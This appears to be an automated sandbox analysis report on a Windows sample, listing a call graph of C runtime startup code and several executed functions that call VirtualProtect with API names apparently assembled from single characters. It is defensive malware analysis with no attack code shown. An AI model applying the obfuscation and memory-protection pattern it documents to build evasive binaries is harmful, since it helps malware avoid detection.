                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 14480 415744 HeapSetInformation 14481 41575d 14480->14481 14482 4157a1 14481->14482 14483 4157a8 14481->14483 14512 4156fb 14482->14512 14520 41698a GetModuleHandleW 14483->14520 14486 4157ae 14487 4157b9 __RTC_Initialize 14486->14487 14488 4156fb _fast_error_exit 45 API calls 14486->14488 14545 41afac GetStartupInfoW 14487->14545 14488->14487 14491 4157d3 GetCommandLineW 14565 41c3ba GetEnvironmentStringsW 14491->14565 14495 4157e3 14571 41c30c GetModuleFileNameW 14495->14571 14497 4157ed 14498 4157f8 14497->14498 14499 417342 __amsg_exit 45 API calls 14497->14499 14575 41c0da 14498->14575 14499->14498 14502 415809 14589 417121 14502->14589 14504 417342 __amsg_exit 45 API calls 14504->14502 14505 415811 14506 417342 __amsg_exit 45 API calls 14505->14506 14507 41581c __wwincmdln 14505->14507 14506->14507 14508 41584c 14507->14508 14595 4172f8 14507->14595 14598 417324 14508->14598 14511 415851 __read 14513 415709 14512->14513 14514 41570e 14512->14514 14601 417964 14513->14601 14610 4177b5 14514->14610 14517 415716 14628 4170a0 14517->14628 14521 4169a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14520->14521 14522 41699e 14520->14522 14524 4169f1 TlsAlloc 14521->14524 14722 4166d7 14522->14722 14527 416b00 14524->14527 14528 416a3f TlsSetValue 14524->14528 14527->14486 14528->14527 14529 416a50 14528->14529 14732 4170ca 14529->14732 14534 416a98 DecodePointer 14537 416aad 14534->14537 14535 416afb 14536 4166d7 __mtterm 49 API calls 14535->14536 14536->14527 14537->14535 14538 416f56 __calloc_crt 45 API calls 14537->14538 14539 416ac3 14538->14539 14539->14535 14540 416acb DecodePointer 14539->14540 14541 416adc 14540->14541 14541->14535 14542 416ae0 14541->14542 14543 416714 __getptd_noexit 45 API calls 14542->14543 14544 416ae8 GetCurrentThreadId 14543->14544 14544->14527 14546 416f56 __calloc_crt 45 API calls 14545->14546 14556 41afca 14546->14556 14547 41b175 GetStdHandle 14553 41b13f 14547->14553 14548 416f56 __calloc_crt 45 API calls 14548->14556 14549 41b1d9 SetHandleCount 14550 4157c7 14549->14550 14550->14491 14558 417342 14550->14558 14551 41b187 GetFileType 14551->14553 14552 41b0bf 14552->14553 14554 41b0f6 InitializeCriticalSectionAndSpinCount 14552->14554 14555 41b0eb GetFileType 14552->14555 14553->14547 14553->14549 14553->14551 14557 41b1ad InitializeCriticalSectionAndSpinCount 14553->14557 14554->14550 14554->14552 14555->14552 14555->14554 14556->14548 14556->14550 14556->14552 14556->14553 14556->14556 14557->14550 14557->14553 14559 417964 __FF_MSGBANNER 45 API calls 14558->14559 14560 41734c 14559->14560 14561 4177b5 __NMSG_WRITE 45 API calls 14560->14561 14562 417354 14561->14562 14743 41730e 14562->14743 14566 41c3cb 14565->14566 14567 41c3cf 14565->14567 14566->14495 14568 416f11 __malloc_crt 45 API calls 14567->14568 14569 41c3f1 _memmove 14568->14569 14570 41c3f8 FreeEnvironmentStringsW 14569->14570 14570->14495 14572 41c341 _wparse_cmdline 14571->14572 14573 416f11 __malloc_crt 45 API calls 14572->14573 14574 41c384 _wparse_cmdline 14572->14574 14573->14574 14574->14497 14576 41c0f2 _wcslen 14575->14576 14580 4157fe 14575->14580 14577 416f56 __calloc_crt 45 API calls 14576->14577 14582 41c116 _wcslen 14577->14582 14578 41c16c 14579 41444c _free 45 API calls 14578->14579 14579->14580 14580->14502 14580->14504 14581 416f56 __calloc_crt 45 API calls 14581->14582 14582->14578 14582->14580 14582->14581 14583 41c192 14582->14583 14585 419c22 __NMSG_WRITE 45 API calls 14582->14585 14586 41c1a9 14582->14586 14584 41444c _free 45 API calls 14583->14584 14584->14580 14585->14582 14587 415c12 __invoke_watson 5 API calls 14586->14587 14588 41c1b5 14587->14588 14590 41712f __IsNonwritableInCurrentImage 14589->14590 14833 41cfc1 14590->14833 14592 41714d __initterm_e 14594 41716e __IsNonwritableInCurrentImage 14592->14594 14836 41386e 14592->14836 14594->14505 14596 4171b8 _doexit 45 API calls 14595->14596 14597 417309 14596->14597 14597->14508 14599 4171b8 _doexit 45 API calls 14598->14599 14600 41732f 14599->14600 14600->14511 14631 41bebb 14601->14631 14603 41796b 14604 417978 14603->14604 14605 41bebb __NMSG_WRITE 45 API calls 14603->14605 14606 4177b5 __NMSG_WRITE 45 API calls 14604->14606 14608 41799a 14604->14608 14605->14604 14607 417990 14606->14607 14609 4177b5 __NMSG_WRITE 45 API calls 14607->14609 14608->14514 14609->14608 14611 4177d6 __NMSG_WRITE 14610->14611 14612 4178e2 14611->14612 14613 41bebb __NMSG_WRITE 42 API calls 14611->14613 14612->14517 14614 4177f0 14613->14614 14615 417901 GetStdHandle 14614->14615 14616 41bebb __NMSG_WRITE 42 API calls 14614->14616 14615->14612 14619 41790f _strlen 14615->14619 14617 417801 14616->14617 14617->14615 14618 417813 14617->14618 14618->14612 14710 419c22 14618->14710 14619->14612 14622 417945 WriteFile 14619->14622 14622->14612 14623 41786c _wcslen 14623->14612 14626 415c12 __invoke_watson 5 API calls 14623->14626 14624 41783f GetModuleFileNameW 14624->14623 14625 417860 14624->14625 14627 419c22 __NMSG_WRITE 42 API calls 14625->14627 14626->14623 14627->14623 14719 417075 GetModuleHandleW 14628->14719 14632 41bec7 14631->14632 14633 41bed1 14632->14633 14638 414403 14632->14638 14633->14603 14644 4167c8 GetLastError 14638->14644 14640 414408 14641 415c64 14640->14641 14697 415c37 DecodePointer 14641->14697 14658 4166a3 TlsGetValue 14644->14658 14647 416835 SetLastError 14647->14640 14650 4167fb DecodePointer 14651 416810 14650->14651 14652 416814 14651->14652 14653 41682c 14651->14653 14666 416714 14652->14666 14679 41444c 14653->14679 14657 416832 14657->14647 14659 4166d3 14658->14659 14660 4166b8 DecodePointer TlsSetValue 14658->14660 14659->14647 14661 416f56 14659->14661 14660->14659 14663 416f5f 14661->14663 14664 4167f3 14663->14664 14665 416f7d Sleep 14663->14665 14685 41cf30 14663->14685 14664->14647 14664->14650 14665->14663 14696 417360 14666->14696 14680 414480 _free 14679->14680 14681 414457 HeapFree 14679->14681 14680->14657 14681->14680 14682 41446c 14681->14682 14683 414403 __fclose_nolock 43 API calls 14682->14683 14684 414472 GetLastError 14683->14684 14684->14680 14686 41cf3c 14685->14686 14688 41cf57 14685->14688 14687 41cf48 14686->14687 14686->14688 14689 414403 __fclose_nolock 44 API calls 14687->14689 14690 41cf6a HeapAlloc 14688->14690 14692 41cf91 14688->14692 14694 417a10 DecodePointer 14688->14694 14691 41cf4d 14689->14691 14690->14688 14690->14692 14691->14663 14692->14663 14695 417a25 14694->14695 14695->14688 14698 415c4c 14697->14698 14703 415c12 14698->14703 14700 415c63 14701 415c37 __fclose_nolock 5 API calls 14700->14701 14702 415c70 14701->14702 14702->14603 14706 415ae9 14703->14706 14705 415c24 GetCurrentProcess TerminateProcess 14705->14700 14707 415b08 __call_reportfault 14706->14707 14708 415b26 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14707->14708 14709 415bf4 __call_reportfault 14708->14709 14709->14705 14711 419c30 14710->14711 14712 419c37 14710->14712 14711->14712 14716 419c58 14711->14716 14713 414403 __fclose_nolock 45 API calls 14712->14713 14714 419c3c 14713->14714 14715 415c64 __fclose_nolock 6 API calls 14714->14715 14717 417834 14715->14717 14716->14717 14718 414403 __fclose_nolock 45 API calls 14716->14718 14717->14623 14717->14624 14718->14714 14720 417089 GetProcAddress 14719->14720 14721 417099 ExitProcess 14719->14721 14720->14721 14723 4166e1 DecodePointer 14722->14723 14724 4166f0 14722->14724 14723->14724 14725 416701 TlsFree 14724->14725 14726 41670f 14724->14726 14725->14726 14727 41b486 DeleteCriticalSection 14726->14727 14728 41b49e 14726->14728 14729 41444c _free 45 API calls 14727->14729 14730 41b4b0 DeleteCriticalSection 14728->14730 14731 4169a3 14728->14731 14729->14726 14730->14728 14731->14486 14741 416691 EncodePointer 14732->14741 14734 4170d2 __init_pointers __initp_misc_winsig 14742 4187e8 EncodePointer 14734->14742 14736 416a55 EncodePointer EncodePointer EncodePointer EncodePointer 14737 41b420 14736->14737 14738 41b42b 14737->14738 14739 41b435 InitializeCriticalSectionAndSpinCount 14738->14739 14740 416a94 14738->14740 14739->14738 14739->14740 14740->14534 14740->14535 14741->14734 14742->14736 14746 4171b8 14743->14746 14745 41731f 14747 4171c4 __read 14746->14747 14767 41b59a 14747->14767 14749 4171cb 14751 4171f6 DecodePointer 14749->14751 14756 417275 14749->14756 14753 41720d DecodePointer 14751->14753 14751->14756 14761 417220 14753->14761 14754 4172f2 __read 14754->14745 14776 4172e3 14756->14776 14757 4172da 14759 4170a0 _doexit 3 API calls 14757->14759 14760 4172e3 14759->14760 14765 4172f0 14760->14765 14781 41b4c1 LeaveCriticalSection 14760->14781 14761->14756 14762 417237 DecodePointer 14761->14762 14766 417246 DecodePointer DecodePointer 14761->14766 14774 416691 EncodePointer 14761->14774 14775 416691 EncodePointer 14762->14775 14765->14745 14766->14761 14768 41b5c2 EnterCriticalSection 14767->14768 14769 41b5af 14767->14769 14768->14749 14782 41b4d8 14769->14782 14771 41b5b5 14771->14768 14772 417342 __amsg_exit 44 API calls 14771->14772 14773 41b5c1 14772->14773 14773->14768 14774->14761 14775->14761 14777 4172c3 14776->14777 14778 4172e9 14776->14778 14777->14754 14780 41b4c1 LeaveCriticalSection 14777->14780 14832 41b4c1 LeaveCriticalSection 14778->14832 14780->14757 14781->14765 14783 41b4e4 __read 14782->14783 14784 41b50a 14783->14784 14785 417964 __FF_MSGBANNER 44 API calls 14783->14785 14792 41b51a __read 14784->14792 14807 416f11 14784->14807 14787 41b4f9 14785->14787 14789 4177b5 __NMSG_WRITE 44 API calls 14787->14789 14793 41b500 14789->14793 14790 41b53b 14795 41b59a __lock 44 API calls 14790->14795 14791 41b52c 14794 414403 __fclose_nolock 44 API calls 14791->14794 14792->14771 14796 4170a0 _doexit 3 API calls 14793->14796 14794->14792 14797 41b542 14795->14797 14796->14784 14798 41b575 14797->14798 14799 41b54a InitializeCriticalSectionAndSpinCount 14797->14799 14800 41444c _free 44 API calls 14798->14800 14801 41b566 14799->14801 14802 41b55a 14799->14802 14800->14801 14812 41b591 14801->14812 14803 41444c _free 44 API calls 14802->14803 14805 41b560 14803->14805 14806 414403 __fclose_nolock 44 API calls 14805->14806 14806->14801 14810 416f1a 14807->14810 14809 416f50 14809->14790 14809->14791 14810->14809 14811 416f31 Sleep 14810->14811 14815 415170 14810->14815 14811->14810 14831 41b4c1 LeaveCriticalSection 14812->14831 14814 41b598 14814->14792 14816 4151ed 14815->14816 14822 41517e 14815->14822 14817 417a10 _malloc DecodePointer 14816->14817 14818 4151f3 14817->14818 14819 414403 __fclose_nolock 44 API calls 14818->14819 14830 4151e5 14819->14830 14820 417964 __FF_MSGBANNER 44 API calls 14820->14822 14821 4151ac HeapAlloc 14821->14822 14821->14830 14822->14820 14822->14821 14823 4177b5 __NMSG_WRITE 44 API calls 14822->14823 14824 4151d9 14822->14824 14825 4170a0 _doexit 3 API calls 14822->14825 14826 417a10 _malloc DecodePointer 14822->14826 14828 4151d7 14822->14828 14823->14822 14827 414403 __fclose_nolock 44 API calls 14824->14827 14825->14822 14826->14822 14827->14828 14829 414403 __fclose_nolock 44 API calls 14828->14829 14829->14830 14830->14810 14831->14814 14832->14777 14834 41cfc7 EncodePointer 14833->14834 14834->14834 14835 41cfe1 14834->14835 14835->14592 14839 413832 14836->14839 14838 41387b 14838->14594 14840 41383e __read 14839->14840 14847 4170b8 14840->14847 14846 41385f __read 14846->14838 14848 41b59a __lock 45 API calls 14847->14848 14849 413843 14848->14849 14850 41374b DecodePointer DecodePointer 14849->14850 14851 413779 14850->14851 14852 4137fa 14850->14852 14851->14852 14864 417042 14851->14864 14861 413868 14852->14861 14854 4137dd EncodePointer EncodePointer 14854->14852 14855 4137af 14855->14852 14858 416fa2 __realloc_crt 49 API calls 14855->14858 14859 4137cb EncodePointer 14855->14859 14860 4137c5 14858->14860 14859->14854 14860->14852 14860->14859 14897 4170c1 14861->14897 14865 417062 14864->14865 14866 41704d 14864->14866 14867 414403 __fclose_nolock 45 API calls 14866->14867 14868 417052 14867->14868 14869 415c64 __fclose_nolock 6 API calls 14868->14869 14870 41378b 14869->14870 14870->14854 14870->14855 14871 416fa2 14870->14871 14874 416fab 14871->14874 14873 416fea 14873->14855 14874->14873 14875 416fcb Sleep 14874->14875 14876 41c5b3 14874->14876 14875->14874 14877 41c5c9 14876->14877 14878 41c5be 14876->14878 14880 41c5d1 14877->14880 14888 41c5de 14877->14888 14879 415170 _malloc 45 API calls 14878->14879 14881 41c5c6 14879->14881 14882 41444c _free 45 API calls 14880->14882 14881->14874 14896 41c5d9 _free 14882->14896 14883 41c616 14884 417a10 _malloc DecodePointer 14883->14884 14886 41c61c 14884->14886 14885 41c5e6 HeapReAlloc 14885->14888 14885->14896 14889 414403 __fclose_nolock 45 API calls 14886->14889 14887 41c646 14891 414403 __fclose_nolock 45 API calls 14887->14891 14888->14883 14888->14885 14888->14887 14890 417a10 _malloc DecodePointer 14888->14890 14893 41c62e 14888->14893 14889->14896 14890->14888 14892 41c64b GetLastError 14891->14892 14892->14896 14894 414403 __fclose_nolock 45 API calls 14893->14894 14895 41c633 GetLastError 14894->14895 14895->14896 14896->14874 14900 41b4c1 LeaveCriticalSection 14897->14900 14899 41386d 14899->14846 14900->14899 16069 40b66e 16070 40b6ac 16069->16070 16073 40b709 16070->16073 16074 40b7d4 16073->16074 16075 40b9b9 16074->16075 16078 40b9a7 16074->16078 16075->16075 16079 40b9ca VirtualProtect 16078->16079 16081 40b9fd 16079->16081 16082 40d7bc ExitProcess 16081->16082 14901 40b9a7 14902 40b9ca VirtualProtect 14901->14902 14904 40b9fd 14902->14904 14905 40d7bc ExitProcess 14904->14905

                                                                  Executed Functions

                                                                  Function 0040B3A9 Relevance: 51.3, APIs: 2, Strings: 27, Instructions: 544COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$HJED$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1824788938
                                                                  • Opcode ID: fb009bf12fba860dd90a1fca2580a9de3574f5c8bef45c0561a189046184be70
                                                                  • Instruction ID: 92b41a86a38d0950ceaafc42da025f647756d5826f6a67780238649d31adf876
                                                                  • Opcode Fuzzy Hash: fb009bf12fba860dd90a1fca2580a9de3574f5c8bef45c0561a189046184be70
                                                                  • Instruction Fuzzy Hash: 111258A2D042549BF7208B24DC45BEB7B78EF91310F1481FAD84D66281D67D1FC68BAB
                                                                  Function 0040B5B8 Relevance: 51.1, APIs: 2, Strings: 27, Instructions: 372COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 2YQ$4>85$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1705831375
                                                                  • Opcode ID: 9179c622394c6dd952b2aaf50aca898e1caa17e1effd9207b73f44d9658fafab
                                                                  • Instruction ID: b4819d296ad88a352d89a36c323faf44c94428e0c63bd935716a99660375177f
                                                                  • Opcode Fuzzy Hash: 9179c622394c6dd952b2aaf50aca898e1caa17e1effd9207b73f44d9658fafab
                                                                  • Instruction Fuzzy Hash: 01D145A2D082949BF7218624DC857EB7B79DF91310F1481FED44D66281D27E0FC68B67
                                                                  Function 0040A96E Relevance: 49.5, APIs: 2, Strings: 26, Instructions: 549memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: 233cec776356fd29b043981c593b48f861d9e98a0ef1bde1cbff54f0f26c5d6e
                                                                  • Instruction ID: 31348504180dde6f2db56645b78a9417e8ac1ec904f0fb92e4b74cabad837206
                                                                  • Opcode Fuzzy Hash: 233cec776356fd29b043981c593b48f861d9e98a0ef1bde1cbff54f0f26c5d6e
                                                                  • Instruction Fuzzy Hash: CE1269E2D082549BF7208624DC85BEB7B79EB91310F1481FAD84D66281D27D4FC6CBA7
                                                                  Function 0040AF5C Relevance: 49.5, APIs: 2, Strings: 26, Instructions: 488COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: d5368f72dc26f51ba87488d6a5a194e7ddb87a056d74db15df06ca2c22eae912
                                                                  • Instruction ID: c211d26a15be80cd6d6061afdc2ec0d619a11bf4a02e20cf0df1070803d10200
                                                                  • Opcode Fuzzy Hash: d5368f72dc26f51ba87488d6a5a194e7ddb87a056d74db15df06ca2c22eae912
                                                                  • Instruction Fuzzy Hash: F40249A2C082549BF7218624DC857EB7B78EF91310F1481FAD84D66281D27D5FC6CBA7
                                                                  Function 0040AF64 Relevance: 49.5, APIs: 2, Strings: 26, Instructions: 487COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-1039757258
                                                                  • Opcode ID: eff81358ff4d72600424c43294880e2fd500d6dc6d11f15188a328bbf02ad914
                                                                  • Instruction ID: c4181e04a6996f4a4ec10402a5543215efd0a88869ad37b10ba3953f19293162
                                                                  • Opcode Fuzzy Hash: eff81358ff4d72600424c43294880e2fd500d6dc6d11f15188a328bbf02ad914
                                                                  • Instruction Fuzzy Hash: 7C023AA2C082549BF7218624DC857EB7B78DB91310F1441FAD84D66282D27D5FC6CBA7
                                                                  Function 0040B077 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 448COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
